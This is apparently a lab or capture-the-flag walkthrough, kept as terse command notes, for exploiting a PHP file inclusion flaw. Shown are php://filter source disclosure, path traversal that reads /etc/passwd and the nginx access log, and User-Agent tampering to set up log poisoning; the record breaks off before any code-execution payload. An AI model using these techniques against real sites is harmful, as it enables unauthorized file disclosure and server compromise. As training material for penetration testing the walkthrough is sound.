FILE INCLUSION
OBJECTIVE: perform a web application penetration assessment with a focus on file inclusion/path traversal vulnerabilities against a company's publicly facing website.
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
WALK THE APPLICATION
#walk the web application and identify potential entry points - look for parameters, pages, etc, where user input can be provided
root@htb:~$ BROWSER > 94.237.54.42:31025
* http://94.237.60.159:50538/index.php?page=contact
- the contact page might be a potential LFI entry pointPERFORM LFI DISCOVERY
#step 1A: identify whether LFI vulnerability exists - perform discovery test
#via basic test
root@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=/etc/passwd
* no output or errors received
#via path traversal
root@htb:~$ BROWSER > http://994.237.54.42:31025/index.php?page=http://94.237.60.159:50538/index.php?page=../../../../../etc/passwd
* Invalid input detected!
#via filename prefix
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?language=/../../../etc/passwd
* Invalid input detected!
#step 1B: identify whether LFI vulnerability exists - perform bypass
#via non-recursive path traversal filter test
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?page=....//....//....//....//etc/passwd
* Invalid input detected!
#via url encoding
root@oco:~$ burpsuite
BURP > Decoder
input: ../../../etc/passwd
encode as: URL
output: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
* the vulnerable application will decode the encoded payload
* Invalid input detected!
root@oco:~$ BROWSER > http://94.237.54.42:31025/index.php?page=./contact/../../../../etc/passwd
* Invalid input detected!
************** NONE WORKED **************************PERFORM SOURCE CODE DISCOVERY
root@htb:~$ locate directory-list-2.3-small.txt
root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .
#fuzz for php files
root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.54.42:31025/FUZZ.php -ic
contact [Status: 200, Size: 2714, Words: 773, Lines: 78, Duration: 80ms]
index [Status: 200, Size: 15829, Words: 3435, Lines: 401, Duration: 80ms]
about [Status: 200, Size: 10313, Words: 2398, Lines: 214, Duration: 81ms]
main [Status: 200, Size: 11507, Words: 2639, Lines: 284, Duration: 78ms]
industries [Status: 200, Size: 8082, Words: 2018, Lines: 197, Duration: 79ms]
error [Status: 200, Size: 199, Words: 41, Lines: 10, Duration: 79ms]
* the -ic flag ignores wordlist comments
* do not limit the scanning to only HTTP 200 response codes. include all codes such as
`301`, `302` and `403` as the source can be read from those pages and may contain
valuable information
#use basic PHP filters to read PHP source code
root@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=contact
* view the page source to ensure the entire encoded string is copied, else it won't fully decode
* ALT: curl http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=contact
- PGRpdiBjbGFzcz0ic2l0ZS1zZWN0aW9uIGJnLWxpZ2h0Ij4KICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgPGRpdiBjbGFzcz0iY29sLW1kLTcgbWItNSI+CgogICAgICAgIAoKICAgICAgICA8Zm9ybSBhY3Rpb249IiMiIGNsYXNzPSJwLTUgYmctd2hpdGUiPgogICAgICAgICAKCiAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3cgZm9ybS1ncm91cCI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC02IG1iLTMgbWItbWQtMCI+CiAgICAgICAgICAgICAgPGxhYmVsIGNsYXNzPSJ0ZXh0LWJsYWNrIiBmb3I9ImZuYW1lIj5GaXJzdCBOYW1lPC9sYWJlbD4KICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgaWQ9ImZuYW1lIiBjbGFzcz0iZm9ybS1jb250cm9sIj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC02Ij4KICAgICAgICAgICAgICA8bGFiZWwgY2xhc3M9InRleHQtYmxhY2siIGZvcj0ibG5hbWUiPkxhc3QgTmFtZTwvbGFiZWw+CiAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIGlkPSJsbmFtZSIgY2xhc3M9ImZvcm0tY29udHJvbCI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgPC9kaXY+CgogICAgICAgICAgPGRpdiBjbGFzcz0icm93IGZvcm0tZ3JvdXAiPgogICAgICAgICAgICAKICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLW1kLTEyIj4KICAgICAgICAgICAgICA8bGFiZWwgY2xhc3M9InRleHQtYmxhY2siIGZvcj0iZW1haWwiPkVtYWlsPC9sYWJlbD4gCiAgICAgICAgICAgICAgPGlucHV0IHR5cGU9ImVtYWlsIiBpZD0iZW1haWwiIGNsYXNzPSJmb3JtLWNvbnRyb2wiPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgIDwvZGl2PgoKICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyBmb3JtLWdyb3VwIj4KICAgICAgICAgICAgCiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC0xMiI+CiAgICAgICAgICAgICAgPGxhYmVsIGNsYXNzPSJ0ZXh0LWJsYWNrIiBmb3I9InN1YmplY3QiPlN1YmplY3Q8L2xhYmVsPiAKICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0ic3ViamVjdCIgaWQ9InN1YmplY3QiIGNsYXNzPSJmb3JtLWNvbnRyb2wiPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgIDwvZGl2PgoKICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyBmb3JtLWdyb3VwIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLW1kLTEyIj4KICAgICAgICAgICAgICA8bGFiZWwgY2xhc3M9InRleHQtYmxhY2siIGZvcj0ibWVzc2FnZSI+TWVzc2FnZTwvbGFiZWw+IAogICAgICAgICAgICAgIDx0ZXh0YXJlYSBuYW1lPSJtZXNzYWdlIiBpZD0ibWVzc2FnZSIgY29scz0iMzAiIHJvd3M9IjciIGNsYXNzPSJmb3JtLWNvbnRyb2wiIHBsYWNlaG9sZGVyPSJXcml0ZSB5b3VyIG5vdGVzIG9yIHF1ZXN0aW9ucyBoZXJlLi4uIj48L3RleHRhcmVhPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgIDwvZGl2PgoKICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyBmb3JtLWdyb3VwIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLW1kLTEyIj4KICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU2VuZCBNZXNzYWdlIiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IHB5LTIgcHgtNCB0ZXh0LXdoaXRlIj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICA8L2Rpdj4KCgogICAgICAgIDwvZm9ybT4KICAgICAgPC9kaXY+CiAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC01Ij4KICAgICAgICAKICAgICAgICA8ZGl2IGNsYXNzPSJwLTQgbWItMyBiZy13aGl0ZSI+CiAgICAgICAgICA8cCBjbGFzcz0ibWItMCBmb250LXdlaWdodC1ib2xkIj5BZGRyZXNzPC9wPgogICAgICAgICAgPHAgY2xhc3M9Im1iLTQiPjIwMyBGYWtlIFN0LiBNb3VudGFpbiBWaWV3LCBTYW4gRnJhbmNpc2NvLCBDYWxpZm9ybmlhLCBVU0E8L3A+CgogICAgICAgICAgPHAgY2xhc3M9Im1iLTAgZm9udC13ZWlnaHQtYm9sZCI+UGhvbmU8L3A+CiAgICAgICAgICA8cCBjbGFzcz0ibWItNCI+PGEgaHJlZj0iIyI+KzEgMjMyIDMyMzUgMzI0PC9hPjwvcD4KCiAgICAgICAgICA8cCBjbGFzcz0ibWItMCBmb250LXdlaWdodC1ib2xkIj5FbWFpbCBBZGRyZXNzPC9wPgogICAgICAgICAgPHAgY2xhc3M9Im1iLTAiPjxhIGhyZWY9IiMiPnlvdXJlbWFpbEBkb21haW4uY29tPC9hPjwvcD4KCiAgICAgICAgPC9kaXY+CiAgICAgICAgCiAgICAgICAgPGRpdiBjbGFzcz0icC00IG1iLTMgYmctd2hpdGUiPgogICAgICAgICAgPGgzIGNsYXNzPSJoNSB0ZXh0LWJsYWNrIG1iLTMiPk1vcmUgSW5mbzwvaDM+CiAgICAgICAgICA8cD5Mb3JlbSBpcHN1bSBkb2xvciBzaXQgYW1ldCwgY29uc2VjdGV0dXIgYWRpcGlzaWNpbmcgZWxpdC4gSXBzYSBhZCBpdXJlIHBvcnJvIG1vbGxpdGlhIGFyY2hpdGVjdG8gaGljIGNvbnNlcXV1bnR1ci4gRGlzdGluY3RpbyBuaXNpIHBlcmZlcmVuZGlzIGRvbG9yZSwgaXBzYSBjb25zZWN0ZXR1cj8gRnVnaWF0IHF1YWVyYXQgZW9zIHF1aSwgbGliZXJvIG5lcXVlIHNlZCBudWxsYS48L3A+CiAgICAgICAgICA8cD48YSBocmVmPSIjIiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IHB4LTQgcHktMiB0ZXh0LXdoaXRlIj5MZWFybiBNb3JlPC9hPjwvcD4KICAgICAgICA8L2Rpdj4KCiAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgPC9kaXY+CjwvZGl2Pgo=
root@htb:~$ echo 'PGRpdiBjbGFzcz0...snip...' | base64 -d
...SNIP...
...
...SNIP...
* nothing interstingroot@htb:~$ BROWSER > http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=index
* view the page source to ensure the entire encoded string is copied, else it won't fully decode
* ALT: curl http://94.237.54.42:31025/index.php?page=php://filter/read=convert.base64-encode/resource=index
- PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KICA8aGVhZD4KICAgIDx0aXRsZT5JbmxhbmVGcmVpZ2h0PC90aXRsZT4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSwgc2hyaW5rLXRvLWZpdD1ubyI+CgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9UG9wcGluczoyMDAsMzAwLDQwMCw3MDAsOTAwfERpc3BsYXkrUGxheWZhaXI6MjAwLDMwMCw0MDAsNzAwIj4gCiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImZvbnRzL2ljb21vb24vc3R5bGUuY3NzIj4KCiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9ib290c3RyYXAubWluLmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9tYWduaWZpYy1wb3B1cC5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvanF1ZXJ5LXVpLmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9vd2wuY2Fyb3VzZWwubWluLmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9vd2wudGhlbWUuZGVmYXVsdC5taW4uY3NzIj4KCiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9ib290c3RyYXAtZGF0ZXBpY2tlci5jc3MiPgoKICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iZm9udHMvZmxhdGljb24vZm9udC9mbGF0aWNvbi5jc3MiPgoKCgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvYW9zLmNzcyI+CgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3Mvc3R5bGUuY3NzIj4KICAgIAogIDwvaGVhZD4KICA8Ym9keT4KICAKICA8ZGl2IGNsYXNzPSJzaXRlLXdyYXAiPgoKICAgIDxkaXYgY2xhc3M9InNpdGUtbW9iaWxlLW1lbnUiPgogICAgICA8ZGl2IGNsYXNzPSJzaXRlLW1vYmlsZS1tZW51LWhlYWRlciI+CiAgICAgICAgPGRpdiBjbGFzcz0ic2l0ZS1tb2JpbGUtbWVudS1jbG9zZSBtdC0zIj4KICAgICAgICAgIDxzcGFuIGNsYXNzPSJpY29uLWNsb3NlMiBqcy1tZW51LXRvZ2dsZSI+PC9zcGFuPgogICAgICAgIDwvZGl2PgogICAgICA8L2Rpdj4KICAgICAgPGRpdiBjbGFzcz0ic2l0ZS1tb2JpbGUtbWVudS1ib2R5Ij48L2Rpdj4KICAgIDwvZGl2PgogICAgCiAgICA8aGVhZGVyIGNsYXNzPSJzaXRlLW5hdmJhciBweS0zIiByb2xlPSJiYW5uZXIiPgoKICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICA8ZGl2IGNsYXNzPSJyb3cgYWxpZ24taXRlbXMtY2VudGVyIj4KICAgICAgICAgIAogICAgICAgICAgPGRpdiBjbGFzcz0iY29sLTExIGNvbC14bC0yIj4KICAgICAgICAgICAgPGgxIGNsYXNzPSJtYi0wIj48YSBocmVmPSJpbmRleC5waHAiIGNsYXNzPSJ0ZXh0LXdoaXRlIGgyIG1iLTAiPklubGFuZUZyZWlnaHQ8L2E+PC9oMT4KICAgICAgICAgIDwvZGl2PgogICAgICAgICAgPGRpdiBjbGFzcz0iY29sLTEyIGNvbC1tZC0xMCBkLW5vbmUgZC14bC1ibG9jayI+CiAgICAgICAgICAgIDxuYXYgY2xhc3M9InNpdGUtbmF2aWdhdGlvbiBwb3NpdGlvbi1yZWxhdGl2ZSB0ZXh0LXJpZ2h0IiByb2xlPSJuYXZpZ2F0aW9uIj4KCiAgICAgICAgICAgICAgPHVsIGNsYXNzPSJzaXRlLW1lbnUganMtY2xvbmUtbmF2IG14LWF1dG8gZC1ub25lIGQtbGctYmxvY2siPgogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJhY3RpdmUiPjxhIGhyZWY9ImluZGV4LnBocCI+SG9tZTwvYT48L2xpPgogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWFib3V0Ij5BYm91dCBVczwvYT48L2xpPgogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWluZHVzdHJpZXMiPkluZHVzdHJpZXM8L2E+PC9saT4KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSJpbmRleC5waHA/cGFnZT1jb250YWN0Ij5Db250YWN0PC9hPjwvbGk+CgkJPD9waHAgCgkJICAvLyBlY2hvICc8bGk+PGEgaHJlZj0iaWxmX2FkbWluL2luZGV4LnBocCI+QWRtaW48L2E+PC9saT4nOyAKCQk/PgogICAgICAgICAgICAgIDwvdWw+CiAgICAgICAgICAgIDwvbmF2PgogICAgICAgICAgPC9kaXY+CgoKICAgICAgICAgIDxkaXYgY2xhc3M9ImQtaW5saW5lLWJsb2NrIGQteGwtbm9uZSBtbC1tZC0wIG1yLWF1dG8gcHktMyIgc3R5bGU9InBvc2l0aW9uOiByZWxhdGl2ZTsgdG9wOiAzcHg7Ij48YSBocmVmPSIjIiBjbGFzcz0ic2l0ZS1tZW51LXRvZ2dsZSBqcy1tZW51LXRvZ2dsZSB0ZXh0LXdoaXRlIj48c3BhbiBjbGFzcz0iaWNvbi1tZW51IGgzIj48L3NwYW4+PC9hPjwvZGl2PgoKICAgICAgICAgIDwvZGl2PgoKICAgICAgICA8L2Rpdj4KICAgICAgPC9kaXY+CiAgICAgIAogICAgPC9oZWFkZXI+CgogIAoKICAgIDxkaXYgY2xhc3M9InNpdGUtYmxvY2tzLWNvdmVyIG92ZXJsYXkiIHN0eWxlPSJiYWNrZ3JvdW5kLWltYWdlOiB1cmwoaW1hZ2VzL2hlcm9fYmdfMS5qcGcpOyIgZGF0YS1hb3M9ImZhZGUiIGRhdGEtc3RlbGxhci1iYWNrZ3JvdW5kLXJhdGlvPSIwLjUiPgogICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgIDxkaXYgY2xhc3M9InJvdyBhbGlnbi1pdGVtcy1jZW50ZXIganVzdGlmeS1jb250ZW50LWNlbnRlciB0ZXh0LWNlbnRlciI+CgogICAgICAgICAgPGRpdiBjbGFzcz0iY29sLW1kLTgiIGRhdGEtYW9zPSJmYWRlLXVwIiBkYXRhLWFvcy1kZWxheT0iNDAwIj4KICAgICAgICAgICAgCgogICAgICAgICAgICA8aDEgY2xhc3M9InRleHQtd2hpdGUgZm9udC13ZWlnaHQtbGlnaHQgbWItNSB0ZXh0LXVwcGVyY2FzZSBmb250LXdlaWdodC1ib2xkIj5Xb3JsZHdpZGUgRnJlaWdodCBTZXJ2aWNlczwvaDE+CiAgICAgICAgICAgIDxwPjxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLXByaW1hcnkgcHktMyBweC01IHRleHQtd2hpdGUiPkdldCBTdGFydGVkITwvYT48L3A+CgogICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvZGl2PgogICAgPC9kaXY+ICAKCjw/cGhwCmlmKCFpc3NldCgkX0dFVFsncGFnZSddKSkgewogIGluY2x1ZGUgIm1haW4ucGhwIjsKfQplbHNlIHsKICAkcGFnZSA9ICRfR0VUWydwYWdlJ107CiAgaWYgKHN0cnBvcygkcGFnZSwgIi4uIikgIT09IGZhbHNlKSB7CiAgICBpbmNsdWRlICJlcnJvci5waHAiOwogIH0KICBlbHNlIHsKICAgIGluY2x1ZGUgJHBhZ2UgLiAiLnBocCI7CiAgfQp9Cj8+CiAgICA8Zm9vdGVyIGNsYXNzPSJzaXRlLWZvb3RlciI+CiAgICAgICAgPGRpdiBjbGFzcz0icm93IHB0LTUgbXQtNSB0ZXh0LWNlbnRlciI+CiAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbWQtMTIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJib3JkZXItdG9wIHB0LTUiPgogICAgICAgICAgICA8cD4KICAgICAgICAgICAgPCEtLSBMaW5rIGJhY2sgdG8gQ29sb3JsaWIgY2FuJ3QgYmUgcmVtb3ZlZC4gVGVtcGxhdGUgaXMgbGljZW5zZWQgdW5kZXIgQ0MgQlkgMy4wLiAtLT4KICAgICAgICAgICAgQ29weXJpZ2h0ICZjb3B5OzxzY3JpcHQ+ZG9jdW1lbnQud3JpdGUobmV3IERhdGUoKS5nZXRGdWxsWWVhcigpKTs8L3NjcmlwdD4gQWxsIHJpZ2h0cyByZXNlcnZlZCB8IFRoaXMgdGVtcGxhdGUgaXMgbWFkZSB3aXRoIDxpIGNsYXNzPSJpY29uLWhlYXJ0IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPiBieSA8YSBocmVmPSJodHRwczovL2NvbG9ybGliLmNvbSIgdGFyZ2V0PSJfYmxhbmsiID5Db2xvcmxpYjwvYT4KICAgICAgICAgICAgPCEtLSBMaW5rIGJhY2sgdG8gQ29sb3JsaWIgY2FuJ3QgYmUgcmVtb3ZlZC4gVGVtcGxhdGUgaXMgbGljZW5zZWQgdW5kZXIgQ0MgQlkgMy4wLiAtLT4KICAgICAgICAgICAgPC9wPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgIDwvZGl2PgogICAgPC9mb290ZXI+CiAgPC9kaXY+CgogIDxzY3JpcHQgc3JjPSJqcy9qcXVlcnktMy4zLjEubWluLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvanF1ZXJ5LW1pZ3JhdGUtMy4wLjEubWluLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvanF1ZXJ5LXVpLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvcG9wcGVyLm1pbi5qcyI+PC9zY3JpcHQ+CiAgPHNjcmlwdCBzcmM9ImpzL2Jvb3RzdHJhcC5taW4uanMiPjwvc2NyaXB0PgogIDxzY3JpcHQgc3JjPSJqcy9vd2wuY2Fyb3VzZWwubWluLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvanF1ZXJ5LnN0ZWxsYXIubWluLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvanF1ZXJ5LmNvdW50ZG93bi5taW4uanMiPjwvc2NyaXB0PgogIDxzY3JpcHQgc3JjPSJqcy9qcXVlcnkubWFnbmlmaWMtcG9wdXAubWluLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvYm9vdHN0cmFwLWRhdGVwaWNrZXIubWluLmpzIj48L3NjcmlwdD4KICA8c2NyaXB0IHNyYz0ianMvYW9zLmpzIj48L3NjcmlwdD4KCiAgPHNjcmlwdCBzcmM9ImpzL21haW4uanMiPjwvc2NyaXB0PgogICAgCiAgPC9ib2R5Pgo8L2h0bWw+Cg==
root@htb:~$ echo 'PCFET0NW...snip...' | base64 -d
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>EXPLORE THE IDENTIFIED ADMIN PAGE
#explore the admin page
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php
chat log
service log
system log
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php?log=chat.log
<138>Sep 09 07:28:01 mante4575 in[7570]: If we synthesize the circuit, we can get to the SCSI array through the neural SCSI interface!
<112>Sep 09 07:28:01 yundt6125 sunt[87]: We need to parse the virtual FTP bandwidth!
<30>Sep 09 07:28:01 dicki1780 quia[4511]: Try to input the HDD card, maybe it will compress the primary sensor!
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php?log=http.log
{"host":"58.96.247.205", "user-identifier":"-", "datetime":"09/Sep/2020:07:28:32 +0000", "method": "GET", "request": "/value-added/eyeballs", "protocol":"HTTP/1.1", "status":501, "bytes":2211, "referer": "https://www.principalconvergence.info/content"}
{"host":"164.239.74.66", "user-identifier":"denesik4023", "datetime":"09/Sep/2020:07:28:32 +0000", "method": "PUT", "request": "/syndicate/engineer", "protocol":"HTTP/1.0", "status":405, "bytes":18494, "referer": "https://www.corporateseize.org/e-tailers/holistic/enhance"}
root@htb:~$ BROWSER > http://94.237.50.242:37264/ilf_admin/index.php?log=system.log
<138>3 2020-09-09T07:27:49.129Z investorunleash.org eos 3425 ID998 - I'Ll parse the online AGP panel, that should array the PNG program!
<14>3 2020-09-09T07:27:49.129Z internalconvergence.org quo 8246 ID412 - Try to parse the SMTP alarm, maybe it will override the multi-byte application!
<112>1 2020-09-09T07:27:49.129Z chiefschemas.info suscipit 1261 ID785 - Try to hack the CSS firewall, maybe it will quantify the virtual capacitor!
<134>1 2020-09-09T07:27:49.129Z principalvirtual.com magni 1276 ID240 - The AGP bandwidth is down, generate the redundant hard drive so we can calculate the IB application!
* PERFORM LFI DISCOVERY ON THE ADMIN PAGE
#step 1A: identify whether LFI vulnerability exists - perform discovery test
#via basic test
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=/etc/passwd
* no output or errors received
#via path traversal
#manually determine the number of ../ required for path traversal
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../etc/passwd
* no effect
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../etc/passwd
* no effect
root@htb:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologinEXPLOIT THE LFI WITH LOG POISONING TO GAIN RCE
#identify the type of server used by the target - nginx or apache
root@htb:~$ curl -I 94.237.50.242:37264
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 10 Feb 2025 00:29:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.22
#STEP 2: test whether apache or nginx's logs can be accessed
root@oco:~$ BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log
10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/index.php?log=../../../../../etc.passwd HTTP/1.1" 200 935 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/style.css HTTP/1.1" 200 24858 "http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../etc.passwd" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
10.30.18.253 - - [10/Feb/2025:00:35:40 +0000] "GET /ilf_admin/c.css HTTP/1.1" 404 125 "http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../etc.passwd" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
* nginx's log location is in /var/log/nginx on Linuux and in c:\nginx\log\
on windows. the nginx logs are readable by low privileged users by
default (e.g., www-data) and can be exploited the same way as apache's
access.log.
- nginx's log files are named access.log for access logs and error.log for error logs.
* the User-Agent header can be controlled by attackers through the HTTP request
headers and can be poisoned
- logs tend to be huge, and loading them in an LFI vulnerability may take a while to load, or even crash the server in worst-case scenarios#use this alternate method of locating log files if the defaults aren't available
root@htb:~$ find / -iname LFI* -type f 2>/dev/null
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/usr/share/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
root@htb:~$ cp /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt .
root@htb:~$ ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/FUZZ' | grep -E '*.log'
...
/var/mysql.log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]
/var/saf/_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]
/var/spool/logs [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]
/var/saf/port/log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/var/www/log/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/var/www/logs/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/var/www/logs/access.log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 78ms]
/../../var/www/logs/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 79ms]
/var/www/log/error_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 79ms]
../../../../../../../var/www/logs/access_log [Status: 200, Size: 2046, Words: 150, Lines: 102, Duration: 77ms]#STEP 3: modify the User-Agent header to Apache Log Poisoning
root@oco:~$ burpsuite
BURP > BROWSER > http://83.136.255.142:57618/index.php?language=/var/log/apache2/access.log
BROWSER > http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log
BURP > Proxy > Intercept
Request
...
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
* send the request to repeater
BURP > Repeater
Request
...
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
* change the value of "User-Agent" string to an {arbitraryValue}
- this tests whether the modified user-agent string will take effect prior to creating an rce payload
- set the user-agent string to something that can be easily identified
Response
...
